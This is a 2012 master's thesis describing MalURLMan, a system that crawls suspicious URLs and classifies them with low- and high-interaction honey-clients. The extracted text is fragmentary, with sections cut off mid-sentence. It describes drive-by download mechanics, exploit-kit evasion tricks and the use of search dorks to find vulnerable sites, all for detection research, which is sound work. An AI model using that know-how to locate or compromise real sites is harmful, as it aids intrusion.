URL Crawling & Classification System
URL Crawling & Classification System
Emil Vaagland
June 2012
ii
Abstract
Today, malware is often found on legitimate web sites that have been hacked. The
aim of this thesis was to create a system to crawl potential malicious web sites and
rate them as malicious or not. Through research into current malware trends and
mechanisms to detect malware on the web, we analyzed and discussed the problem
space, before we began designing the system architecture. After we had implemented
our suggested architecture, we ran the system through tests. These test shed some
light on the challenges we had discussed. We found that our hybrid honey-client
approach was of benefit to detect malicious sites, as some malicious sites were only
found when both honey-clients cooperated. In addition, we got insight into how a
LIHC can be useful as a queue pre-processor tool for a HIHC. On top of that, we
learned the consequence of operating a system like this without a well built proxy
server network: false-negatives.
iii
iv
Norwegian Abstract
I dag er det vanlig å finne ondsinnet programvare på hackede nettsider. Målet med
denne masteroppgaven var å lage et system for å finne og analysere potensielle nett-
sider med ondsinnet programvare på, og klassifisere dem som ondsinnet eller ikke.
Gjennom undersøkelser inn i aktuelle ondsinnede trusler på nettsider og metoder for
å detektere disse, analyserte vi og diskuterte problemene, før vi foreslo en systemar-
kitektur. Etter vi hadde implementert systemet, kjørte vi systemet gjennom tester.
Disse testene kastet lys på noen av problemene vi hadde diskutert. Vi fant ut at vår
konfigurasjon med to forskjellige «honey-clients» nyttig for å detektere ondsinnede
nettsider, siden noen ondsinnede nettsider kun ble funnet da disse utvekslet data. I
tillegg til det, fikk vi innsikt i hvordan en såkalt «low-interaction honey-client» kan
være brukbar for å pre-prosessere analysekøen til en såkalt «high-interaction honey-
client». Videre, lærte vi om konsekvensen av å kjøre et slikt system uten støtte for
såkalte «proxy servers», nemlig feilaktige negative resultater på «honey-client» ana-
lyser.
v
vi
Preface
This report describes the work I have carried out as a part of my master’s thesis in
Information Security in the 10th semester of the Master’s Program in Communication
Technology at the Norwegian University of Science and Technology.
I would like to thank my supervisor Svein Johan Knapskog for input and good
feedback during the whole period. I would also like to thanks my co-supervisors Felix
Leder and Trygve Brox at Norman ASA for feedback, technical assistance and access
to Norman’s system MAG2.
vii
viii
Acronyms
AS Autonomous System
ix
x
Contents
Abstract iii
Norwegian Abstract v
Preface vii
Acronyms ix
1 Introduction 1
1.1 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2 Scope and objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.3 Related work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.4 Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.5 Method . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
2 Background 5
2.1 Client-Side Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.1.1 Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2.1.2 Malicious sites . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.1.3 Browser Exploit Packs . . . . . . . . . . . . . . . . . . . . . . 9
2.2 Honey-Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.2.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.2.2 Low-Interaction Honey-Clients . . . . . . . . . . . . . . . . . . 10
2.2.2.1 PhoneyC and Thug . . . . . . . . . . . . . . . . . . . 11
xi
2.2.2.2 HoneyC . . . . . . . . . . . . . . . . . . . . . . . . . 12
2.2.3 High-Interaction Honey-Clients . . . . . . . . . . . . . . . . . 12
2.2.3.1 Malware Analyzer G2 . . . . . . . . . . . . . . . . . 13
2.2.3.2 Capture-HPC / Capture-HPC NG . . . . . . . . . . 13
2.3 Similar systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.3.1 HoneySpider Network . . . . . . . . . . . . . . . . . . . . . . . 14
2.3.2 Google Safe Browsing . . . . . . . . . . . . . . . . . . . . . . . 16
2.3.3 urlQuery.net . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
2.3.4 International Secure Systems Lab . . . . . . . . . . . . . . . . 17
2.4 Open Source Intelligence . . . . . . . . . . . . . . . . . . . . . . . . . 17
2.4.1 Search Engine Intelligence . . . . . . . . . . . . . . . . . . . . 17
2.4.2 Whois information . . . . . . . . . . . . . . . . . . . . . . . . 19
2.4.3 IP/DNS Information . . . . . . . . . . . . . . . . . . . . . . . 19
2.5 URL Seed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.5.1 Trends and Search Engine Poisoning . . . . . . . . . . . . . . 20
2.5.2 Searching for various strings . . . . . . . . . . . . . . . . . . . 20
2.5.3 Email Spam boxes . . . . . . . . . . . . . . . . . . . . . . . . 22
2.5.4 Social media sites . . . . . . . . . . . . . . . . . . . . . . . . . 22
3 Challenges 23
3.1 Perpetual work load . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
3.2 Analysis Result Validity . . . . . . . . . . . . . . . . . . . . . . . . . 24
3.3 Avoiding Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
3.4 Independent analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
3.5 URL Prioritization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
3.6 Selecting and Operating HIHC Configurations . . . . . . . . . . . . . 28
3.7 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
4 System architecture 30
4.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
4.2 Technical Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
4.3 MalURLMan Use of Zend Framework . . . . . . . . . . . . . . . . . . 32
xii
4.4 Honey-Client Selection . . . . . . . . . . . . . . . . . . . . . . . . . . 33
4.4.1 Low-Interaction Honey-Client: Thug . . . . . . . . . . . . . . 33
4.4.2 High-Interaction Honey-Client: Capture-HPC NG . . . . . . . 34
4.4.3 High-Interaction Honey-Client: MAG2 . . . . . . . . . . . . . 35
4.5 MalURLMan Access points . . . . . . . . . . . . . . . . . . . . . . . . 35
4.5.1 REST API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
4.5.2 ZF Environment . . . . . . . . . . . . . . . . . . . . . . . . . 36
4.6 URL Import and Queuing . . . . . . . . . . . . . . . . . . . . . . . . 36
4.6.1 Sources and Import . . . . . . . . . . . . . . . . . . . . . . . . 37
4.6.2 Queue . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
4.7 Honey-Client Analysis Modules . . . . . . . . . . . . . . . . . . . . . 37
4.7.1 Thug Analysis Module . . . . . . . . . . . . . . . . . . . . . . 38
4.7.1.1 Thug.php . . . . . . . . . . . . . . . . . . . . . . . . 38
4.7.1.2 Thug_results.php . . . . . . . . . . . . . . . . . . . 39
4.7.1.3 Thug_mag2_sample.php . . . . . . . . . . . . . . . 40
4.7.2 MAG2 Analysis Module . . . . . . . . . . . . . . . . . . . . . 41
4.7.2.1 Mag2.php . . . . . . . . . . . . . . . . . . . . . . . . 42
4.7.2.2 Mag2_results.php . . . . . . . . . . . . . . . . . . . 43
4.7.2.3 mag2_page.php . . . . . . . . . . . . . . . . . . . . 44
4.8 Open Source Intelligence Modules . . . . . . . . . . . . . . . . . . . . 44
4.9 URL Rating Scheme . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
5 System Evaluation 46
5.1 MalURLMan Features . . . . . . . . . . . . . . . . . . . . . . . . . . 46
5.2 MalURLMan Usage Example 1 . . . . . . . . . . . . . . . . . . . . . 47
5.2.1 URL Import . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
5.2.2 URL Queue . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
5.2.3 Test Discussion . . . . . . . . . . . . . . . . . . . . . . . . . . 49
5.3 MalURLMan Usage Example 2 . . . . . . . . . . . . . . . . . . . . . 51
5.3.1 Thug Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
5.3.2 MAG2 Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . 52
xiii
5.3.3 Test Discussion . . . . . . . . . . . . . . . . . . . . . . . . . . 52
6 Conclusion 54
6.1 Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
Bibliography 56
Bibliography 56
A Screenshots 59
A.1 Vendors.pro Sales Add . . . . . . . . . . . . . . . . . . . . . . . . . . 59
A.2 Blackhole Exploit Kit Screenshots . . . . . . . . . . . . . . . . . . . . 60
A.2.1 Statistics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
A.2.2 Block List Functionality . . . . . . . . . . . . . . . . . . . . . 61
A.3 Google Safe Browsing Report . . . . . . . . . . . . . . . . . . . . . . 62
B Source Code 63
B.1 Thug MAEC Log Example . . . . . . . . . . . . . . . . . . . . . . . . 63
B.2 Zend Framework Bootstrap script . . . . . . . . . . . . . . . . . . . . 67
B.3 Malware.com.br Import Script . . . . . . . . . . . . . . . . . . . . . . 68
B.4 Malware.com.br Test Import Script . . . . . . . . . . . . . . . . . . . 69
B.5 Malwaredomainlist Import Script . . . . . . . . . . . . . . . . . . . . 71
B.6 Core.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
B.7 DNS.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
B.8 Ping.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
B.9 Whois.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
B.10 Thug.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
B.11 Thug_results.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
B.12 MAG2.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
B.13 MAG2 results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
B.14 MAG2 Thug Sample . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
B.15 MAG2 Risk . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
B.16 MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
xiv
List of Tables
xv
xvi
List of Figures
A.1 Here we see the vendor of the Black Hole exploit kit advertising its
features on the russian board vendors.pro. This screenshot was taken
on 12.4.2012, and it was automatically translated from Russian to En-
glish using Google Chrome. It is not the latest version of Blackhole,
but it showcases who advanced it was at that time. . . . . . . . . . . 59
A.2 The statistics view in the Black Hole Exploit Kit, source: http://www.xylibox.com/search/l
A.3 Blackhole block list functionality . . . . . . . . . . . . . . . . . . . . 61
A.4 Google Safe Browsing Report for comment-twitt.ru . . . . . . . . . . 62
xvii
xviii
Chapter 1
Introduction
1.1 Motivation
Today most computers get infected with malware when they are used to browse
legitimate web sites. Cyber criminals have a big attack surface, if we consider the
complexity of today’s web browsers which has support for JavaScript, and third-
party plug-ins like Adobe Flash, Adobe PDF Reader and Java. As a result, new
security vulnerabilities are reported every week, and probably even more are found
and exploited in the wild before they are detected and reported. Therefore, in order
to protect users browsing the web from getting exploited and infected by malware,
we need a system that should be able to detect both known and unknown exploits on
web sites.
At present, malware on the web is complex and easy to deploy. It is possible to
rent so-called browser exploit packs on internet boards, which are packs created by
professional malware vendors. These kits have many features, such as serving exploits
based on what type client is visiting, and they even mechanisms to avoid detection
by anti-virus vendors and detection mechanisms. As a consequence, crawling the web
with an old fashioned crawler and running the crawled web sites through an anti-virus
scan will not necessary detect malware. Instead of crawling the web blindly, we will
need a smarter way to gather URLs that are likely to be malicious and find ways to
reliably detect and manage malicious URLs.
1
2 CHAPTER 1. INTRODUCTION
Security researchers have developed methods for detecting malicious web sites
based on the concept of honey-clients. Honey-clients are divided into high-interaction
and low-interaction honey-clients, where the low-interaction variant is based on em-
ulated clients, whereas the high-interaction client is based on real clients usually in a
virtualized machine. Both variants have pros and cons which suits different needs.
By developing a system that can retrieve URLs from any customized source, and
analyze these URLs with analysis modules such as honey-clients, we can effectively
detect malicious web sites. This thesis will focus on building the foundation of such
a system.
prevalence of malware on the web based on Google’s web page repository and their
architecture for detecting malicious web pages was described in both papers. The
most similar project is the HoneySpider Network1 , which has been in active develop-
ment since 2007 with over 20 people involved over the years. Their goal is to develop
a system to process bulk volume of URLs to detect and identify malicious URLs. In
addition, the HSN project has released their own adaption of the high-interaction
honey-client Capture-HPC called Capture-HPC NG2 .
1.4 Limitations
By considering the six month timeframe of this project, and looking into other similar
projects like the HSN-project, it is obvious that time is limiting this project. This
will limit the time we have to design and implement the system. Therefore, the focus
of this thesis will be on creating the foundation elements of a system to analyze and
manage malicious URLs, by implementing support for already existing URL analysis
software like honey-clients.
1.5 Method
To achieve the goals of this project we are going to use the following method:
• Review the state-of-art in this field and do research about malware and similar
and existing systems to form the basis of this system.
1
The HoneySpider Network project is a joint venture between NASK/CERT Polska, GOV-
CERT.NL, and SURFnet http://www.honeyspider.net
2
Capture-HPC NG can be found here: http://pl.honeynet.org/HoneySpiderNetworkCapture/
4 CHAPTER 1. INTRODUCTION
Chapter 2
Background
Today most applications are deployed on the web, and the users access these web ap-
plications with their clients, which usually are a modern web browser with support for
third-party plug-ins. Today’s browsers such as Microsoft Internet Explorer (MSIE),
Google Chrome, Apple Safari and Mozilla Firefox all support complex client-side
operations through JavaScript, and rendering of a wide variety of content through
included libraries. These browsers also have support for plugins such as Adobe Flash,
Java, and Adobe PDF Reader which are maintained by third-parties. As the com-
plexity of web browsers and their third-party plugins increases, the attack surface for
exploit writers increases as well. Just the code base of Google Chrome consists alone
5
6 CHAPTER 2. BACKGROUND
2.1.1 Clients
The most common web browsers on the web today are Chrome, MSIE, Firefox, Safari,
and Opera, with Chrome just passing MSIE as the most popular browser, see figure
2.1 for a overview of the usage percentage. Seeing that Chrome is gaining market share
very rapidly, it is likely that more exploit writers will try to focus on finding exploits
for Chrome. This should be taken into consideration when choosing of software
combination for a high-interaction honey-client configuration. However, it should be
noted that most Browser Exploit Packs (see section 2.1.3) ships with exploits that
attacks the plugins used by browsers to make their attack vectors independent of
browsers, as seen in the BlackHole Exploit Kit sales add in A.1. Instead of having
specific exploits that target platform specific browsers, they target cross-platform
technologies such as Java and Adobe Flash to hit a bigger part of the potential victims.
1
http://www.ohloh.net/p/chrome/analyses/latest.
2
SQL injection attacks are possible when SQL queries against database backends incorporates
user-provided data which has not been properly sanitized by the developer. Leaving the SQL query
open for manipulation by attackers, resulting in that attackers could send custom SQL queries
against the database.
2.1. CLIENT-SIDE SECURITY 7
As we can see in A.2.1, from a live instance of Black Hole the most successful exploit
in this case is a Java exploit for all platforms3 .
Figure 2.1: Top 5 Browsers from W20 2011 to W20 2012, from[1]
and after a successful exploitation, download and execute malware from a malware
distribution site. This kind of attack is not noticeable by the target, and anyone that
are vulnerable to the attack gets infected by merely visiting the seemingly legitimate
site. Therefore, this kind of attack is called a Drive-by Downloads[9]. This kind of
client-side attacks are on the rise[10]. See Figure 2.2 for a schematic overview of a
example Drive-By Download attack.
2. Infected site sends normal response back to the user while it stealthy triggers a
vulnerability in the client that downloads and runs the malware loader.
4. Malware distribution site sends the full malware payload the loader executes it
on the victim.
This is just one of several models for Drive-by downloads. More complex patterns
with more redirects exist, where the user gets redirected to an exploit host before the
malware loader is executed.
2.1. CLIENT-SIDE SECURITY 9
Another recent advancement in detection avoidance for BEP’s was recently found
in Nuclear Pack Version 2.0[16], which only execute exploit code if mouse movement
is detected by javascript. This will effectively render honey-clients which does not
emulate mouse movement useless for detecting this exploit.
2.2 Honey-Clients
In this section we will go through some different honey-clients and look into their
capabilities.
2.2.1 Introduction
A honeypot is a vulnerable server system set up to lure attackers into exploiting it,
so that researchers can observe and analyze what is being done. Instead of passively
waiting for attackers to exploit a honeypot, honey-clients actively visits malicious
content in order to detect attacks. Honey-clients are systems that runs a client ap-
plication against potentially malicious web site. Honey-clients are divided into low-
interaction honey-clients (LIHC) and high-interaction honey-clients (HIHC), where
the high-interaction variants simulates a real OS running real vulnerable client soft-
ware, and the low-interaction variants are applications emulating the behavior of the
client applications. There are both strengthd and weaknesses with both types. In
general are LIHC fast and easy to manage and deploy, whereas the HIHC are slower
and more difficult to manage and deploy. However, the HIHC are much more likely to
detect new attacks and obtain malware samples, whereas the low-interaction honey-
clients does not detect new attacks. In the following sub sections we will look into
what kind of features different kinds of honey-clients have.
Because of this, they can visits URLs with different browser personalities from the
same installation. In addition, these clients are much safer because real exploits for
MSIE on Windows will not damage an emulated client on a Linux machine pretending
to be MSIE on Windows. Furthermore, since these LIHC are light-weight they are
easier to deploy in large scale. Still, the biggest drawback with these types of clients
is that they are easy to detect because the fact that they are emulated and not based
on real systems. Another drawback is that they can not detect 0-day attacks but
only known attacks. Usually, detection mechanisms for LIHC are based on signatures
from intrusion detection systems (IDS) like Snort6 or anti-virus engines. Therefore,
these types of clients can be used to detect known threats quickly. In the following
sub sections we will present some of the current public LIHC.
2.2.2.2 HoneyC
HoneyC is a LIHC that detect malicious web sites based on Snort signatures. The
architecture of HoneyC is based on three components: the queue, the visitor, and the
analysis engine. These three components are controlled by a core component. An
interesting feature of the queue component is that it supports collecting URLs based
on Yahoo! and Google search queries for specific key words. However, HoneyC have
not been in active development since 2005, and features like collecting URLs from
Google search queries are not longer working due to API changes11
version works in the same way as Capture-HPC, however it also adds a whole range
of new features to Capture-HPC with support for new virtualization environments
like VirtualBox and KVM, extended logging, uploading URLs via file and socket and
many bug fixes[18].
13
https://www.virustotal.com/
14
http://safeweb.norton.com/
15
http://www.honeyspider.net/
16
http://www.nask.pl/ and http://www.cert.pl/
17
http://www.govcert.nl/
18
http://www.surfnet.nl/
2.3. SIMILAR SYSTEMS 15
Google already crawl the whole web and got a good index of candidate URLs that
could be malicious. By applying something they call simple heuristics, they reduce
the number of candidate URLs that are likely to be malicious significantly. After de-
termining the potential malicious URLs, the URLs are visited with Google’s Windows
based high-interaction honey-clients to verify if the malicious candidate URLs are ma-
licious. They also scan the HTTP responses using multiple anti-virus engines[5][3].
See figure 2.4 for an overview of their architecture.
2.3.3 urlQuery.net
The urlQuery.net project was launched in 2011 and is a public service for detecting and
analyzing web-based malware. urlQuery.net provides detailed information about the
action the browser does when visiting a page such as HTTP transactions, Javascript
actions. In addition to that, it deobfuscates all known exploit kits, and got support
for signatures for quick detection of known exploits through their IDS.
2.4. OPEN SOURCE INTELLIGENCE 17
our honey-clients. In addition to that, we have the “site” search operator23 which
returns all the webpages that belong to a specified site. This number can be used as
an indication for how big the site is. For instance, if it returns several thousand sites,
we can safely assume that this site has been in operation for a while, and also linked
to from other indexed sites. By using the Google search operator “link:” 24 Google
returns all the pages that link to a specific URL. By checking the reputation of these
sites again, we can draw some conclusions about whether the site is good or bad, i.e.
is it just linked to by suspicious sites or healthy sites? However, if a site has zero
results with the “site:” operator, we can safely assume that the site is brand new, and
not linked to by any other sites. Which can be seen on as suspicious, as it may imply
that the domain is used as a fast flux domain for a malware distribution network.
Information from search engines is not enough to classify a URL as malicious or
not. However, it can in combination with other information be used to assume the
maliciousness of a URL. For instance, if we get zero results for a URL in a hidden
iframe tag, the possibility of that iframe is loading a malicious site, and then we
can call that URL for a good candidate URL for processing in a high interaction
honey-client.
Additionally, the LinkFromDomain operator from Bing25 , can be used to find all
sites that a site links to. There are several interesting traits of information that can be
gathered from this. The first obvious thing will be to check all the domains linked to
in our repository of already analyzed and classified sites to see if we have determined
it to be malicious. If that is the case, it may be an indication that this site also may
contain malicious code. Another possibility could be to do quick checks at external
black lists like Google’s Safe Browsing API26 or VirusTotal to determine if the URLs
linked to have had a history of maliciousness. Another solution could be to look at
the types of domains linked to if there are any suspicious connections. For instance,
if a norwegian web site links to a russian site in an hidden iframe, it is definitely
23
Big Site search operator: http://msdn.microsoft.com/en-us/library/ff795613
24
Google Search operators: http://www.googleguide.com/advancedoperators.html
25
Bing LinkFromDomain Operator: http://www.bing.com/community/site_blogs/b/search/archive/2006/10/16/search-
macros-linkfromdomain.aspx
26
https://developers.google.com/safe-browsing/
2.4. OPEN SOURCE INTELLIGENCE 19
something suspicious to investigate further. Alternatively, one could check the rating
of the Autonomous System (AS) the domains are pointing too with BGP Ranking27 ,
or the internal reputation an AS has in MalURLMan or other external sources.
Whois information can say something about when the domain first was registered,
updated and when it expires, in addition to name servers. It is also often possible to
get registrant information from a Whois query, but in recent years features like “whois
protection” has become available for more privacy for registrants. For each Top Level
Domain (TLD) you will need to query a specific whois server to get information. The
data delivered in response to a Whois query is in text form and formatted in different
ways depending on which Whois server you ask, which makes it harder to parse with
scripts.
27
https://github.com/Rafiot/bgp-ranking
20 CHAPTER 2. BACKGROUND
Figure 2.5: Top five categories for entering into malware networks, from [4]
TDS and BEP vendors tend to obfuscate their URL patterns by applying commonly
used URL words. For instance, one TDS28 have the following pattern on their iframe
src attributes: “http://host.tld/?go=2”, and Blackhole uses a very common URL
pattern with “showthread.php?t=<random number>29 ” which is common for Web
Boards. Thus, applying this kind of signature based approach to detect potential
malicious URLs struggle with the same problems as traditional anti-virus engines
have, and it will need a lot of work to keep up with all the different obfuscation
techniques.
Vulnerable and outdated versions of commonly used web applications such as
Joomla or Wordpress are very often exploited in the wild by cybercriminals. There-
fore, by monitoring which types of commonly used web applications and plugins that
have security vulnerabilities, and creating search strings for these vulnerable appli-
cations, we could potentially find a lot of sites that have been exploited by cyber-
criminals and injected with malicious code. In fact, the Google Hacking-Database30
maintains a list of search queries for both vulnerable files and vulnerable servers.
28
http://urlquery.net/report.php?id=58713
29
http://urlquery.net/report.php?id=58743
30
http://www.exploit-db.com/google-dorks/
22 CHAPTER 2. BACKGROUND
Thus if we can finding vulnerable URLs with these search strings, the possibility that
some cybercriminals have already exploited the vulnerabilities are present, and we
may qualify the URL/host as possible malicious and worthy of a honey-client visit.
31
Klout score could be used, klout.com
Chapter 3
Challenges
23
24 CHAPTER 3. CHALLENGES
some of our system components are going to be in constant work. Given that a typical
analysis by a HIHC takes between 1-2 minutes1 , depending on the configuration,
checking a batch of 3000 URLs will take one HIHC about 50 hours. Therefore we
should carefully consider which URLs we select for analysis in our HIHC component.
We could implement a priority mechanism in the analysis queue by giving URLs that
are likely to be malicious higher priority than URLs that are not. We will discuss
this priority mechanism in greater detail in section 3.5.
Also, after rating an URL as malicious, the system should re-evaluate the URL
again at a later time to check if it still is malicious in order to keep false-positives
out of our ratings. If a URL re-evaluation has positive results, then we have reduced
the amount of false-positives in our system, which is a desired feature. Keeping the
amount of false-positives should be a priority, especially if the URL ratings generated
by the system are used as blocking lists in other systems as it is done with Google
Chrome/ Safe Browsing. Having the system re-evaluating URLs further complicates
the system in many aspects, including adding more work load and exposing the system
for BEP detection mechanisms. See section 3.3 for more about avoiding detection.
a TDS injected iframe, and that TDS does not have any buyers of norwegian web
traffic, then it may not be exploited. However, other clients on the same system setup,
but different geographical location may be served malicious content. In addition, if
the IP we are visiting from are known to the BEP, and already blacklisted, we might
not get any malicious content at all.
What we can learn from the example above is that one check with a specific
HIHC configuration is not necessary enough to detect a malicious site. There may be
cases where the same exact HIHC configuration gets exploited based on geographical
location of the IP. Thus, if a HIHC is not exploited, then maybe another HIHC
configuration can be, and we should therefore consider visiting a URL from different
HIHC configurations. However, this requires vast amount of resources including a
large array of different HIHC configuration and a substantial amount of proxies from
different geographical locations.
Another issue we will need to consider is how long our URL rating is valid. An
URL marked as malicious may be cleaned up at some time. Therefore, as mentioned
in section 3.1, we should always re-evaluate URLs that has been flagged as malicious
at a later time, in order to keep false-positives out of our systems. However, in order
to avoid false-negatives we must avoid detection which we will discuss next.
the LIHC instance run through the same batch of URLs as the HIHC on a much faster
rate. If an URL is serving a new threat not detectable by the LIHC, the HIHC would
not be able to detect it either in the subsequent request, because it simply would
not be served the same malicious page. Therefore, making sure that an URL is not
visited from the same IP by the different analysis modules is crucial to our analysis
process. Yet, different URLs may contain a malicious iframe redirecting to the same
BEP, and for that reason, visiting independent URLs may yield false-negatives due
to the fact that the BEP will not serve malicious content the second time it sees the
IP. This introduces another problem for our system, as it needs to be able to know
all the URLs an IP has visited, and that includes all the URLs it has loaded content
from when visiting a site. Seeing that it is not possible to know what other URLs
the web site we are visiting are loading before we visit it, we will have to visit the
page and observe which URLs are loaded, and especially look at those URLs that
raise suspicion. We need to go through all the URLs visited and find out if the IP we
are running our honey-client from has visited any of the URLs before. If it has, we
should re-visit the page with a honey-client with an IP that has not seen any of those
URLs before. It is clear that we need to whitelist certain widely used URLs such as
URLs for javascript libraries hosted by safe providers such as Google2 .
If a system like ours should be able to deliver reliable results, it should be able
to avoid detection and IP blocking. This can be done by implementing support for
proxies. In order to do that properly, our system must have an overview over which
URLs were visited through which proxy. By making the system be aware of this, we
can create processes that takes this into account.
whole system will be dependent on the EULA and API restrictions of that system,
and also, our analysis base will be watered down if for instance Google decides to
restrict or close down it’s API entirely, or charge ridiculous amounts for each API
call. Also, taking into account that the work in this thesis is done for a commercial
security vendor, dependence of potential rivals should be avoided. The second rea-
son for analytic independence when it comes to analyzing URLs, is that it is more
valuable. If we can observe the malicious page successfully exploiting an instance of
our high-interaction honey-client, we will receive more information about the attack,
which can be very valuable for a security vendor if the analysis detected a new 0-day
attack for instance. However, it should be noted that external resources could be very
valuable as input for determining the likelihood that an URL is malicious, so that
we can rank the priority of URLs that are more likely to be malicious higher in the
HIHC processing queue. In the next section we go through information that could be
used to rank priority of URLs in the processing queue.
• Query the database of our system, see if the domain, IP, AS, country has had
a history of malicious sites.
• Ask public APIs like VirusTotal, Google Safe Browsing API, and other black
lists if they have a history on the URL, domain, IP, or AS.
In addition, the analysis results we quickly can get from our LIHC, can also be used
to look for any suspicious features of the HTML / JavaScript as described in [19].
28 CHAPTER 3. CHALLENGES
3
By HIHC configuration we mean a set of properties that defines the system based on: OS,
browser, plugins and IP.
4
This vulnerability can be used to run arbitrary Java code outside of the sandbox,
http://schierlm.users.sourceforge.net/CVE-2011-3544.html
3.7. SUMMARY 29
setup would cover a wide specter as possible, with many instances of each HIHC
configuration in order to analyze more URLs in parallel.
3.7 Summary
This chapter provided a more detailed view of problems and challenges that we have
to have in mind when creating a system for crawling and rating malicious URLs. In
the next chapter we will present the architecture for our system, in which we try to
address many of the issues illustrated in this chapter. However, it should be noted
that many of these problems are beyond the scope of this thesis in terms of work load.
Thus we will try to design the system in such a way that it can be easily extended in
the future to address and implement support for this.
Chapter 4
System architecture
In the previous chapters we discussed the challenges we will have to consider when
designing our system, in addition to necessary background information about the
technologies. In this chapter will create an architecture for our system and go into
the technical details regarding the design decisions.
4.1 Introduction
One of the ideas behind this system design, is to lay the foundations for a modular
system by focusing on the core functionality. In this way, the foundation can be
expanded and further improved at a later time. In short, we are going to create a
system for managing malicious URLs, therefore have we named the system MalURL-
Man which is short for Malicious URL Manager. MalURLMan is based on three core
concepts: importing URLs, analyzing URLs, and managing the whole process. The
design of a system based on this concept can be modeled on a typical honey-client
framework [21], which consists of just these different modules for importing URLs,
honey-clients for processing URLs, and a management component to control the whole
process. We are going to expand this model a bit further by introducing the analysis
modules beyond just honey-clients to other information gathering modules as well.
See figure 4.1 for an overview of the overall architecture. We will in the following
sections introduce the different modules we have based our system architecture on,
30
4.2. TECHNICAL LIMITATIONS 31
Before we lay out our system design, we should mention our limitations when it comes
to our infrastructure. We have one machine dedicated to running this system on, in
addition to access to Norman’s MAG2 service. Which means we will have one IP for
our machine and one IP for the MAG2 URL analysis tasks.
It should also be noted that we are going to focus on the core parts of the system
architecture from figure 4.1. Functionality such as administrative front-end will not
be the focus here due to time limitations. We will use tools such as phpMyAdmin1
and phpMoAdmin2 with simple database queries to view the data our system collects.
1
phpMyAdmin, tool for administration of MySQL databases, http://www.phpmyadmin.net/
2
phpMoAdmin, tool for administration of MongoDB, http://www.phpmoadmin.com/
32 CHAPTER 4. SYSTEM ARCHITECTURE
We have created a MVC for URLs, which allows us to access and submit URLs
from everywhere in our environment where we have loaded the ZF. This is very useful,
as we can re-use the same code for saving URLs to the database in both the RESTful
controller and in other scripts bootstrapping the ZF.
All the MalURLMan modules are based on standalone scripts based on the ZF
bootstrap. In this way, every module has access to the whole ZF, in addition to our
UrlMapper which can be used to for instance save URLs. The modules are meant to
be run as CLI cron jobs with different execution intervals depending on what tasks
they are executing.
samples are also stored. A full example of a MAEC analysis log can be found in B.1,
and in the list below we describe the events and samples collection from MongoDB.
The MongoDB collection Events stores MAEC analysis files. In this log format we
can find something it calls “dynamic analysis” which basically stores all the Javascript
code snippets it finds on the web site. No analysis is done to determine if it is harmless
or not, or at least, no information about that can be found in the logging format.
However, Thug recently7 added support for pre- and post-processing plugins, which
gives us the ability to write plugins that could examine these javascript snippets to
see if they contain anything suspicious such as obfuscation techniques and so forth.
The other MongoDB collection called samples, stores any executable that is exe-
cuted when visiting a URL. It could store a executable if it is redirected to one, or if
a Java applet tries to run a jar file for instance.
As of now, we can not really use data from Thug to reliable determine if the page
is malicious. Further work and improvements are needed in Thug. However, there
are a lot of data saved that we can use to rate a page as likely malicious with. This
is valuable for creating queue priority mechanisms and filtering out benign URLs.
For the samples found, we are going to use Thug in cooperation with the MAG2
IVM environment, by uploading samples and executing them as tasks in the IVM
environment. We will describe that process in more detail in section 4.7.1.3.
that submitted URLs to our API, or we could have a partner querying the API for
information about a URL, or we could have a partner leverage the API to run his own
tests. Instead of giving partners direct access to database, we can control what they
are allowed to do through our API. There are many possibilities, and making sure
our framework has support for further implementations like this was a key factor.
The REST interface we implemented in MalURLMan is very basic, as we aimed
for implementing core features for our goals. The functionality in our REST API is
the ability to submit URLs in addition to a simple mechanism for providing access
to the API through an API key. To access this functionality one can place a HTTP
query in the following way with the HTTP client curl:
This will add the url in question to the URL import queue by utilizing the ZF Url
Mapper we mentioned in 4.3, and this call can be placed from any other system that
has access and wish to add URLs to the system.
4.5.2 ZF Environment
4.6.2 Queue
After URLs are added to the system through an import script they are stacked up
in the URL queue. From there they are processed by the MalURLMan core module
which inserts every URL into the URL Analysis Queue for the different analysis mod-
ules. Each analysis module has its own queue, which provides flexibility in processing,
